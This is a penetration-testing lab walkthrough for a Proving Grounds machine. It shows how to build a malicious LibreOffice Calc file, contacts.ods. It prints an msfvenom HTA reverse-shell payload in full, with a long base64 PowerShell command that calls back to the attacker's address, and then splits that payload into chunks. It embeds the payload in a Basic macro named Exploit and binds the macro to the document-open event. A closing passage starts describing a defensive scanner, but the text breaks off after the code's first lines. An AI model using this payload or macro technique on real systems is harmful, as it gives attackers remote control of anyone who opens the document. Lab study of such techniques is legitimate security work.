Libre Office (.ods)
Creating a LibreOffice Calc file: contacts.ods
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=$tun0 LPORT=443 -f hta-psh
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of hta-psh file: 7264 bytes
<script language="VBScript">
window.moveTo -4000, -4000
Set mucOrun4MuJ = CreateObject("Wscript.Shell")
Set stT = CreateObject("Scripting.FileSystemObject")
For each path in Split(mucOrun4MuJ.ExpandEnvironmentStrings("%PSModulePath%"),";")
If stT.FileExists(path + "\..\powershell.exe") Then
mucOrun4MuJ.Run "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARABzADcAeAAyAGMAQwBBADcAVgBXAGIAVwAvAGEAJwAnACsAJwAnAFMAQgBEACsAWABxAG4ALwB3AGEAcQBRAGIARQB1AEUAdAA5AEMAawBpAFYAVABwAGIARgA1AHsAMQB9AGMAQQBJADQAbQBBAEIARgBwADgAVgBlADIAdwB0AHIATAA3AFgAWAB2AFAAWAA2ADMAMgA4AE0AZABrAGsAVQBVAHUAVgBPADYAawBvAEkAZQAzAFoAbQBkAHYAYQBaAFoAMgBiAHMAeABJAEgARgBDAFEAdQBFADYARQByADQAOABmAEcARABrAEsANABlAEMAcABFAHYAUwBMAG4ASQB2AHoAWgA2AGUAUwBIAG4AOABUAFcAUgBUADkAdQA1ACsAWAA0AHUAZgBCAFcAawBxAGIASgBhADEAWgBtAFAAUwBEAEMANwB2AGEAMwBGAFkAWQBnAEQAZgBuAHcAdgB0AEQAQgBYAG8AZwBqADcAYwAwAHAAdwBKAE0AbgBDAFAAOABMAEkAdwB5AEcAKwBlAEoAZwB2AHMATQBXAEYASAAwAEwAdQA3ADAASwBMAHMAagBtAGkAcQBkAHEAdQBoAGkAdwBQAEMAeABkAEsAWQBDAGQANwBYAFcAYQBoAEoATABDAEMAcwBhAEsARQBTACsASwAzAGIANgBJADgAdgBTAGoAUABDAG8AMwB2AE0AYQBLAFIASgBCAHEANwBpAEcATwAvAFkARgBNAHEAeQBzAEoAUABPAFQAbgB3AGMAYgBmAEMAawBxAGcAVABLADIAUQBSAGMAMwBoACcAJwArACcAJwBoAFIASQBMAEwAUwBtAEUAWQBSAE0AagBCADkAKwBCAHQAagBYAFgATQBQAFcAWgBIAE
kAdAB6AGwAZABKAHMAUQA4AHoAJwAnACsAJwAnAGcATQBEAHAAZABLAHYAQgB4ADEASgBCAEUAZQBlAHkARwB6AEYAewAxAH0AcwBPAGMAUgBTACcAJwArACcAJwBKAGUAVwBHAGEAKwBKAC8ATwBaAG4AOQBKADAALwBUAHcAUQBSAHgAdwA0AHUATwBDAEYAbgBBAGMAcwBwAFcAQgB3AHoAVwB4AGMARgBSAG8AbwA4AEMAbQBlAEkAQwBkAEcAVgBnAFoAUABDAFMAQgBPADUAewAxAH0AbABVAEYAdQB6AEoAWgBaAHkAUQBVAHgAcABYAHYAZwB2AGIAcQBSADcAdgBNAG0AZwBlADYAKwBSADkAewAxAH0AdwBJAHQASABvADgAbABQAE8AUQAwADkAZgBYADEASgBrAGQAVQAzAHcAMABGAE0ALwBFACcAJwArACcAJwBlAGEAUwBCAEQAQwB1AGoAQQB1AEQAMwBNADQASABRAHkAZQBnAFQATwAyAGYAbwBjAHgASgBrAGEAMwByAFkAdwBSAEMAeAAxAEcATQBSAE8AWgBoACsARgBVAHAANQBRAFkAZgBEAEUAVwBmAGgARABsADUAegBqADIARwBNADUAZABrAHYAdgBJAFgAYwBJAHMAcQAvADEAMQBjADUATQB3AFEAegBpADIASwBRAFQARQAxAEcANwB7ADEAfQBuAEoALwBrAFgAdQBjADIAcwAxAFUAWABtAGIAeAAzAFgAcwBrAEEARABYAGQAdwBIAHkAaQBaAFYAUgBWAFQAcQBYAEQAKwB4AFEAZgBBAEMAagBrAEsAbgBkAFEAMwBpAFMAbQBHADUAZwB1ADQANABwAGQAaABGAFAASQBFADUAbwA4AGMAcQBzADQAUgBQACsAeQAxAGEAewAxAH0AQwBiAFYAeABxAEYAaQBRADAAdwBpAGkAJwAnACsAJwAnAGcAbgBUAEwATAA0AE0ANQBaAGsAMABTAHQAVQBEAEgAUABpAEIAMwBmAEEAZQBlADUAaAB3AG8ARQBKAHgAcABwADAAVwB4ACcAJwArACcAJwB5ADAANQBQADMAawBGAEoAcgBGAEUAVQBSAFgAbQBoAEYAMABPAEYAVwBuAG4AQgB3AEkAaABpAE8AeQA4AG8AUQBVAFQAUwBMAFMAWABtADcAUABBAG8AbgBzAEwAVgBZADgAcQBKAGgAUwBLAGUAJwAnACsAJwAnAHUAWgB2AEoATAA4AEIATQBEADYAMgB4AEkATwBKAGgAYgBFAEYARwBBAFkAQgBIAFkANABVAHQAZwBtAGkAQwBSADEANQBvAEUAeAB1AHIATwA0AE8ANAAyAGUASABpAFcAVABSAHEAaQBGAEsAbwBHAC8AQwAwAGgAbQB5AEEASgBFAEgAQgA0AEEAbABQAFEAbwBnAFQATwBDAEUAWABEAE0AdwAxAGYAMABXAHgARAB4AHEASABiAHQARwBrAHkASQBYAGUAawB7ADEAfQBiAEcAZwBWAGIASQB4AGIAWgA0AHsAMQB9AHMAJwAnACsAJwAnAGkAcwBBAG8ANQAwAFQAegBEAEoAdwBIAGcAVwBJAGkAVABhAG8ASQB6AG4AQgBaAE8ARQBIAEQAcABQAGcAaQAvAHcANgBuADgARQA4AEwAcgBoAFEAQwBTADEARQBLAGMANQBrAGIASwBhAG0AcQBvADcAbgB0AEEAKwBoADUALwAyAEMAVABkAFQAYQBBADUAQQBoAEIAeABBAGEASQBiAE0AVgAxAEcARQByADYAcgBIADEAaQBKADkASwBqADYAUQBtAGcASgByAHIAQQBWAFUAdAA5AFEAbABLAFMAcwBiAFUAdABaADAAKwBBADMASgBwAGMAYgBxADEALwBaAGQAWgA5AEUAdQBoAHYAVwB0ADUAeQBoAGEAcABPAG4AdABYAHIAMwBmAGIAbABmAFgASABjAE8AcwBjAH
EATwBoADgAYgB1AGUAeAB2AFgARwAwADIASgBoAEsATwAzAEIAYwBNAHcAbgBtAHQASgArAEoASwBYAGwAdQBMAHAAZgBkAGMAagBlADYAQwByADIAZQBGAHUAOAAyAHEAdgA3AFQAVQBuAGQANwBoAGUAdQA3AFkAegByAGoAdQB7ADEAfQBlAE8AOABhAGcALwBMAGwASgB1AHEAewAxAH0AYQBYAHkAMQBWAFUATABmAGUAaQBMAHMAagBkAGEATwBXAHEAbABHAEQAYgB7ADEAfQBwADkATQB1AHcAdgBPADAAMAArAEgANQBzAFUARABaADIAaQArADEAUwArAFEAVwBUAGIARABSAGQAbQBtAGUAbAA3AFQAVgBGAGEAMwBxAFcAMQA3AHoAaABtAHkAOQBQAHQAMwBiAGgAZAB2AEIAbABWAGwAMABwAEQAVQBXAHAAQgB3ADIAeQBxADcARwA2AHMAaABrAHEAdgBhAEEANgBiAGEAbgAvAFkAVQBQAHQAOQBrAEYAMgA1AFIAYQBjAEsATQBsAHAAaABUAGEAVABYAFcASABkAEMAbQBlAEkAcQBhAGwAdwB7ADEAfQBmAE8AUwBwAEkANwB7ADEAfQBDAEoAcQB1AG4AZwBRAGUAKwBtAGgAQwBDAFgAaQB4AFYAewAxAH0AUgB0ACcAJwArACcAJwB2ADIAWgBmAHUAaQBKAGoAcgBvAG8AbABhADkAMwB5AGkAMQBEAHIAVgBzAHYAMQBrADcAdABzAFYANQBIAFUAbQBaAHQAeQA5AG0AVQBSADIAbwAxAFAAZgBxAE0AcQA0ADMATwBpAG8AOQAnACcAKwAnACcAWgBiAFMARwBBAHkASAB6AGMAbgBJAFgARQA1ACcAJwArACcAJwBHAGoAMwBRAHkARwBwAFkAbgBEAEYAdQBiAG8AZwBjACsAQwBGAFkAZgB6AE8AVwA4AHEATABkAGMAegBkAHUAVwBYAFQAagByACsAdQBEAGYASgB6ADYAZABWACsAegBpAHoAZgBDAEwARwBtAHoAdQAzAHsAMQB9ADcAYQB0AGYAdQBqADYAOABIADIAZgBqAGUAdgBNAEcAVgBZAEwASgBxAGYASQB7ADEAfQBmAFQASQBRAG4ANABaAFEAWABTAGYASABPAGQAOQBNAEMAUABIADMAJwAnACsAJwAnAEsAcgBYAFUAVgA3AGwAdgBHADMATwByAHkATwB3AHMAaABEAEYASgBnAEEAdgBUAHUAcgB3ACcAJwArACcAJwB5AFkATABtADIAawB6ADcAagBHAFMAVwBFAGcAUwB6AFAAUQBsAEQAZwB7ADEAfQBNAFkAUQByAEMAbgBNAHcAbwByAEYARABLAHIARwBRAFUAUQB7ADEAJwAnACsAJwAnAH0ATwBHAEkAWABRAGMARABjAG0AawBHAG0AcQBIAGkATQA0ADkAeQBjAEkAdgBSAGYAawAwAEkAVABMAFIANwBlADAARQBJACcAJwArACcAJwBvAFMAYQBBAE0AbwBXAHUAagBoAHcAdQBaAGMAdgBiAFMAOQBMAEoAZQBqAHMAcABXADIAcABlAG0ARAAvACsANgA5ACcAJwArACcAJwBWAFkANgB1AGQAbABQAGoASwBKADYAUABoAEEARQB2AHEAbQB4ADUAOABnAHoAdgBpAEMASgBMADAAcAA0AEcAQwA4AGMAKwBoAEcANwAwAEYAMQBWAHUAbwB3AGIAbABMAGEAQgAvAFEAeQA0ADUAMQBuACcAJwArACcAJwBXAEMAbgBNAGsAYQBmAEkANQBkAGUANgBrAFMAQwBFADMAQwBBAFcAQgBtAHUAUABVADMAbQBmAGsASQBPAHMATAAvAEEAMwA0AFUAYwBUADYAYgBpADgAeQBtAGIAOAArAFoALwBrAGkAMQBwAGEALwBMAGcAegAvADQAOQBXADAANgB5ADMAKwB5ACsAaQAwAE
cAbAAvAEIARwBZAFYAKwBLAFgAZwBtAGYAdAAvAEkAOQBkAGYANABRAEkAQgB6ADAARABHAGkAegBGAHgAMQBGAC8ARABvAFcAMABQAEoANQBsADEAcABzAEQAOQA1ADEAMABKAFIAKwArAEQAegBHAC8AdQBJAGQAUAAnACcAKwAnACcAcQBVAHsAMQB9AC8ALwB4AGMAZQAvAEkATQBnAGMAUQBzAEEAQQBBAHsAMAB9AHsAMAB9ACcAJwApAC0AZgAnACcAPQAnACcALAAnACcATgAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==",0
Exit For
End If
Next
window.close()
</script>
Generating an HTA PowerShell reverse shell payload; only the PowerShell part is needed
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ python3 -c 'str = "powershell.exe -nop -w hidden -e <BASE64_PAYLOAD>"; n = 50; print("str = \"\"") ; [print("str = str + \"" + str[i:i+n] + "\"") for i in range(0, len(str), n)]'
str = ""
str = str + "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4Ad"
str = str + "ABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewA"
str = str + "kAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnA"
str = str + "H0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGk"
str = str + "AcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8Ad"
str = str + "wBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcAB"
str = str + "vAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9A"
str = str + "E4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQ"
str = str + "AaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAU"
str = str + "wB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQB"
str = str + "tAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9A"
str = str + "CcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACA"
str = str + "AJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAc"
str = str + "gBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB"
str = str + "5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkA"
str = str + "GUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGU"
str = str + "AbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAe"
str = str + "gBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQB"
str = str + "jAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5A"
str = str + "FMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4"
str = str + "AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAd"
str = str + "AByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARABzADcAeAA"
str = str + "yAGMAQwBBADcAVgBXAGIAVwAvAGEAJwAnACsAJwAnAFMAQgBEA"
str = str + "CsAWABxAG4ALwB3AGEAcQBRAGIARQB1AEUAdAA5AEMAawBpAFY"
str = str + "AVABwAGIARgA1AHsAMQB9AGMAQQBJADQAbQBBAEIARgBwADgAV"
str = str + "gBlADIAdwB0AHIATAA3AFgAWAB2AFAAWAA2ADMAMgA4AE0AZAB"
str = str + "rAGsAVQBVAHUAVgBPADYAawBvAEkAZQAzAFoAbQBkAHYAYQBaA"
str = str + "FoAMgBiAHMAeABJAEgARgBDAFEAdQBFADYARQByADQAOABmAEc"
str = str + "ARABrAEsANABlAEMAcABFAHYAUwBMAG4ASQB2AHoAWgA2AGUAU"
str = str + "wBIAG4AOABUAFcAUgBUADkAdQA1ACsAWAA0AHUAZgBCAFcAawB"
str = str + "xAGIASgBhADEAWgBtAFAAUwBEAEMANwB2AGEAMwBGAFkAWQBnA"
str = str + "EQAZgBuAHcAdgB0AEQAQgBYAG8AZwBqADcAYwAwAHAAdwBKAE0"
str = str + "AbgBDAFAAOABMAEkAdwB5AEcAKwBlAEoAZwB2AHMATQBXAEYAS"
str = str + "AAwAEwAdQA3ADAASwBMAHMAagBtAGkAcQBkAHEAdQBoAGkAdwB"
str = str + "QAEMAeABkAEsAWQBDAGQANwBYAFcAYQBoAEoATABDAEMAcwBhA"
str = str + "EsARQBTACsASwAzAGIANgBJADgAdgBTAGoAUABDAG8AMwB2AE0"
str = str + "AYQBLAFIASgBCAHEANwBpAEcATwAvAFkARgBNAHEAeQBzAEoAU"
str = str + "ABPAFQAbgB3AGMAYgBmAEMAawBxAGcAVABLADIAUQBSAGMAMwB"
str = str + "oACcAJwArACcAJwBoAFIASQBMAEwAUwBtAEUAWQBSAE0AagBCA"
str = str + "DkAKwBCAHQAagBYAFgATQBQAFcAWgBIAEkAdAB6AGwAZABKAHM"
str = str + "AUQA4AHoAJwAnACsAJwAnAGcATQBEAHAAZABLAHYAQgB4ADEAS"
str = str + "gBCAEUAZQBlAHkARwB6AEYAewAxAH0AcwBPAGMAUgBTACcAJwA"
str = str + "rACcAJwBKAGUAVwBHAGEAKwBKAC8ATwBaAG4AOQBKADAALwBUA"
str = str + "HcAUQBSAHgAdwA0AHUATwBDAEYAbgBBAGMAcwBwAFcAQgB3AHo"
str = str + "AVwB4AGMARgBSAG8AbwA4AEMAbQBlAEkAQwBkAEcAVgBnAFoAU"
str = str + "ABDAFMAQgBPADUAewAxAH0AbABVAEYAdQB6AEoAWgBaAHkAUQB"
str = str + "VAHgAcABYAHYAZwB2AGIAcQBSADcAdgBNAG0AZwBlADYAKwBSA"
str = str + "DkAewAxAH0AdwBJAHQASABvADgAbABQAE8AUQAwADkAZgBYADE"
str = str + "ASgBrAGQAVQAzAHcAMABGAE0ALwBFACcAJwArACcAJwBlAGEAU"
str = str + "wBCAEQAQwB1AGoAQQB1AEQAMwBNADQASABRAHkAZQBnAFQATwA"
str = str + "yAGYAbwBjAHgASgBrAGEAMwByAFkAdwBSAEMAeAAxAEcATQBSA"
str = str + "E8AWgBoACsARgBVAHAANQBRAFkAZgBEAEUAVwBmAGgARABsADU"
str = str + "AegBqADIARwBNADUAZABrAHYAdgBJAFgAYwBJAHMAcQAvADEAM"
str = str + "QBjADUATQB3AFEAegBpADIASwBRAFQARQAxAEcANwB7ADEAfQB"
str = str + "uAEoALwBrAFgAdQBjADIAcwAxAFUAWABtAGIAeAAzAFgAcwBrA"
str = str + "EEARABYAGQAdwBIAHkAaQBaAFYAUgBWAFQAcQBYAEQAKwB4AFE"
str = str + "AZgBBAEMAagBrAEsAbgBkAFEAMwBpAFMAbQBHADUAZwB1ADQAN"
str = str + "ABwAGQAaABGAFAASQBFADUAbwA4AGMAcQBzADQAUgBQACsAeQA"
str = str + "xAGEAewAxAH0AQwBiAFYAeABxAEYAaQBRADAAdwBpAGkAJwAnA"
str = str + "CsAJwAnAGcAbgBUAEwATAA0AE0ANQBaAGsAMABTAHQAVQBEAEg"
str = str + "AUABpAEIAMwBmAEEAZQBlADUAaAB3AG8ARQBKAHgAcABwADAAV"
str = str + "wB4ACcAJwArACcAJwB5ADAANQBQADMAawBGAEoAcgBGAEUAVQB"
str = str + "SAFgAbQBoAEYAMABPAEYAVwBuAG4AQgB3AEkAaABpAE8AeQA4A"
str = str + "G8AUQBVAFQAUwBMAFMAWABtADcAUABBAG8AbgBzAEwAVgBZADg"
str = str + "AcQBKAGgAUwBLAGUAJwAnACsAJwAnAHUAWgB2AEoATAA4AEIAT"
str = str + "QBEADYAMgB4AEkATwBKAGgAYgBFAEYARwBBAFkAQgBIAFkANAB"
str = str + "VAHQAZwBtAGkAQwBSADEANQBvAEUAeAB1AHIATwA0AE8ANAAyA"
str = str + "GUASABpAFcAVABSAHEAaQBGAEsAbwBHAC8AQwAwAGgAbQB5AEE"
str = str + "ASgBFAEgAQgA0AEEAbABQAFEAbwBnAFQATwBDAEUAWABEAE0Ad"
str = str + "wAxAGYAMABXAHgARAB4AHEASABiAHQARwBrAHkASQBYAGUAawB"
str = str + "7ADEAfQBiAEcAZwBWAGIASQB4AGIAWgA0AHsAMQB9AHMAJwAnA"
str = str + "CsAJwAnAGkAcwBBAG8ANQAwAFQAegBEAEoAdwBIAGcAVwBJAGk"
str = str + "AVABhAG8ASQB6AG4AQgBaAE8ARQBIAEQAcABQAGcAaQAvAHcAN"
str = str + "gBuADgARQA4AEwAcgBoAFEAQwBTADEARQBLAGMANQBrAGIASwB"
str = str + "hAG0AcQBvADcAbgB0AEEAKwBoADUALwAyAEMAVABkAFQAYQBBA"
str = str + "DUAQQBoAEIAeABBAGEASQBiAE0AVgAxAEcARQByADYAcgBIADE"
str = str + "AaQBKADkASwBqADYAUQBtAGcASgByAHIAQQBWAFUAdAA5AFEAb"
str = str + "ABLAFMAcwBiAFUAdABaADAAKwBBADMASgBwAGMAYgBxADEALwB"
str = str + "aAGQAWgA5AEUAdQBoAHYAVwB0ADUAeQBoAGEAcABPAG4AdABYA"
str = str + "HIAMwBmAGIAbABmAFgASABjAE8AcwBjAHEATwBoADgAYgB1AGU"
str = str + "AeAB2AFgARwAwADIASgBoAEsATwAzAEIAYwBNAHcAbgBtAHQAS"
str = str + "gArAEoASwBYAGwAdQBMAHAAZgBkAGMAagBlADYAQwByADIAZQB"
str = str + "GAHUAOAAyAHEAdgA3AFQAVQBuAGQANwBoAGUAdQA3AFkAegByA"
str = str + "GoAdQB7ADEAfQBlAE8AOABhAGcALwBMAGwASgB1AHEAewAxAH0"
str = str + "AYQBYAHkAMQBWAFUATABmAGUAaQBMAHMAagBkAGEATwBXAHEAb"
str = str + "ABHAEQAYgB7ADEAfQBwADkATQB1AHcAdgBPADAAMAArAEgANQB"
str = str + "zAFUARABaADIAaQArADEAUwArAFEAVwBUAGIARABSAGQAbQBtA"
str = str + "GUAbAA3AFQAVgBGAGEAMwBxAFcAMQA3AHoAaABtAHkAOQBQAHQ"
str = str + "AMwBiAGgAZAB2AEIAbABWAGwAMABwAEQAVQBXAHAAQgB3ADIAe"
str = str + "QBxADcARwA2AHMAaABrAHEAdgBhAEEANgBiAGEAbgAvAFkAVQB"
str = str + "QAHQAOQBrAEYAMgA1AFIAYQBjAEsATQBsAHAAaABUAGEAVABYA"
str = str + "FcASABkAEMAbQBlAEkAcQBhAGwAdwB7ADEAfQBmAE8AUwBwAEk"
str = str + "ANwB7ADEAfQBDAEoAcQB1AG4AZwBRAGUAKwBtAGgAQwBDAFgAa"
str = str + "QB4AFYAewAxAH0AUgB0ACcAJwArACcAJwB2ADIAWgBmAHUAaQB"
str = str + "KAGoAcgBvAG8AbABhADkAMwB5AGkAMQBEAHIAVgBzAHYAMQBrA"
str = str + "DcAdABzAFYANQBIAFUAbQBaAHQAeQA5AG0AVQBSADIAbwAxAFA"
str = str + "AZgBxAE0AcQA0ADMATwBpAG8AOQAnACcAKwAnACcAWgBiAFMAR"
str = str + "wBBAHkASAB6AGMAbgBJAFgARQA1ACcAJwArACcAJwBHAGoAMwB"
str = str + "RAHkARwBwAFkAbgBEAEYAdQBiAG8AZwBjACsAQwBGAFkAZgB6A"
str = str + "E8AVwA4AHEATABkAGMAegBkAHUAVwBYAFQAagByACsAdQBEAGY"
str = str + "ASgB6ADYAZABWACsAegBpAHoAZgBDAEwARwBtAHoAdQAzAHsAM"
str = str + "QB9ADcAYQB0AGYAdQBqADYAOABIADIAZgBqAGUAdgBNAEcAVgB"
str = str + "ZAEwASgBxAGYASQB7ADEAfQBmAFQASQBRAG4ANABaAFEAWABTA"
str = str + "GYASABPAGQAOQBNAEMAUABIADMAJwAnACsAJwAnAEsAcgBYAFU"
str = str + "AVgA3AGwAdgBHADMATwByAHkATwB3AHMAaABEAEYASgBnAEEAd"
str = str + "gBUAHUAcgB3ACcAJwArACcAJwB5AFkATABtADIAawB6ADcAagB"
str = str + "HAFMAVwBFAGcAUwB6AFAAUQBsAEQAZwB7ADEAfQBNAFkAUQByA"
str = str + "EMAbgBNAHcAbwByAEYARABLAHIARwBRAFUAUQB7ADEAJwAnACs"
str = str + "AJwAnAH0ATwBHAEkAWABRAGMARABjAG0AawBHAG0AcQBIAGkAT"
str = str + "QA0ADkAeQBjAEkAdgBSAGYAawAwAEkAVABMAFIANwBlADAARQB"
str = str + "JACcAJwArACcAJwBvAFMAYQBBAE0AbwBXAHUAagBoAHcAdQBaA"
str = str + "GMAdgBiAFMAOQBMAEoAZQBqAHMAcABXADIAcABlAG0ARAAvACs"
str = str + "ANgA5ACcAJwArACcAJwBWAFkANgB1AGQAbABQAGoASwBKADYAU"
str = str + "ABoAEEARQB2AHEAbQB4ADUAOABnAHoAdgBpAEMASgBMADAAcAA"
str = str + "0AEcAQwA4AGMAKwBoAEcANwAwAEYAMQBWAHUAbwB3AGIAbABMA"
str = str + "GEAQgAvAFEAeQA0ADUAMQBuACcAJwArACcAJwBXAEMAbgBNAGs"
str = str + "AYQBmAEkANQBkAGUANgBrAFMAQwBFADMAQwBBAFcAQgBtAHUAU"
str = str + "ABVADMAbQBmAGsASQBPAHMATAAvAEEAMwA0AFUAYwBUADYAYgB"
str = str + "pADgAeQBtAGIAOAArAFoALwBrAGkAMQBwAGEALwBMAGcAegAvA"
str = str + "DQAOQBXADAANgB5ADMAKwB5ACsAaQAwAEcAbAAvAEIARwBZAFY"
str = str + "AKwBLAFgAZwBtAGYAdAAvAEkAOQBkAGYANABRAEkAQgB6ADAAR"
str = str + "ABHAGkAegBGAHgAMQBGAC8ARABvAFcAMABQAEoANQBsADEAcAB"
str = str + "zAEQAOQA1ADEAMABKAFIAKwArAEQAegBHAC8AdQBJAGQAUAAnA"
str = str + "CcAKwAnACcAcQBVAHsAMQB9AC8ALwB4AGMAZQAvAEkATQBnAGM"
str = str + "AUQBzAEEAQQBBAHsAMAB9AHsAMAB9ACcAJwApAC0AZgAnACcAP"
str = str + "QAnACcALAAnACcATgAnACcAKQApACkAKQAsAFsAUwB5AHMAdAB"
str = str + "lAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDA"
str = str + "G8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGU"
str = str + "AYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8AR"
str = str + "QBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbAB"
str = str + "sAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuA"
str = str + "FIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQ"
str = str + "AcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8Ad"
str = str + "wBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgB"
str = str + "DAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1A"
str = str + "GUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8"
str = str + "AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAY"
str = str + "QByAHQAKAAkAHMAKQA7AA=="
Dividing the payload into 50-character chunks
Creating a new macro module, Exploit, within the contacts.ods file
Basically embedding a macro
REM ***** BASIC *****
Sub Main
Dim str as String
str = ""
str = str + "cmd.exe /C powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4Ad"
[...REDACTED...]
str = str + "HMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA="
Shell(str)
End Sub
Building a macro with the payload
On the contacts.ods window, Tools > Customize > Events
Setting up a trigger so that the malicious macro runs when the file is opened
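From the defender's side, the two things the steps above leave behind in the document are worth checking for: a Basic module stored inside the .ods archive, and a document event binding that fires that module on open. The scanner below is an added example written for this page, not code from the walkthrough or from the MMG-LO project. It assumes the ODF layout as I know it from the spec: an .ods file is a zip, Basic modules live under Basic/<Library>/<Module>.xml, and "Open Document" bindings appear in content.xml as script:event-listener elements with script:event-name="dom:load". The sample document it scans is constructed in memory with a placeholder payload, so it runs offline.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# ODF namespaces for the elements inspected (assumed from the ODF spec).
NS = {
    "office": "urn:oasis:names:tc:opendocument:xmlns:office:1.0",
    "script": "urn:oasis:names:tc:opendocument:xmlns:script:1.0",
    "xlink": "http://www.w3.org/1999/xlink",
}

# Indicators in Basic source that an analyst would want flagged.
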